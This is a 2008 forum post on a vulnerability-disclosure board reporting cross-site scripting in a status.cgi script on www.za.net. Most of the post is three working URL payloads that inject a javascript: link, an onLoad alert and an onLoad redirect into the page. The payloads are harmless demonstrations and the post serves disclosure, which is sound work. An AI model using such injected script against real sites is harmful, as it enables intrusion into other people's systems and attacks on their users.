Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
XSS in www.za.net
Posted by: Reelix
Date: April 30, 2008 06:12AM

www.za.net is the site you go to to host www.blabla.za.net sites.

How about some XSS Attacks? :D


1.) Click-Me
http://www.za.net/cgi-bin/status.cgi?domain=%3Ca%20href=javascript:alert(%22XSS%22)%3EAn%20XSS%20Attack%3C/a%3E

2.) Page-Load

Needs to be entered manually... (Modify the htetep to http)

htetep://www.za.net/cgi-bin/status.cgi?domain=%3CBODY%20onLoad=%22alert('You%20have%20been%20attacked%20by%20XSS!\n\n-%20Reelix')%22%3E

3.) Page Redirect
http://www.za.net/cgi-bin/status.cgi?domain=%3CBODY%20onLoad=%22void(window.location='http://www.google.com/')%22%3E

- Reelix



Edited 2 time(s). Last edit at 04/30/2008 06:13AM by Reelix.

Options: ReplyQuote


Sorry, only registered users may post in this forum.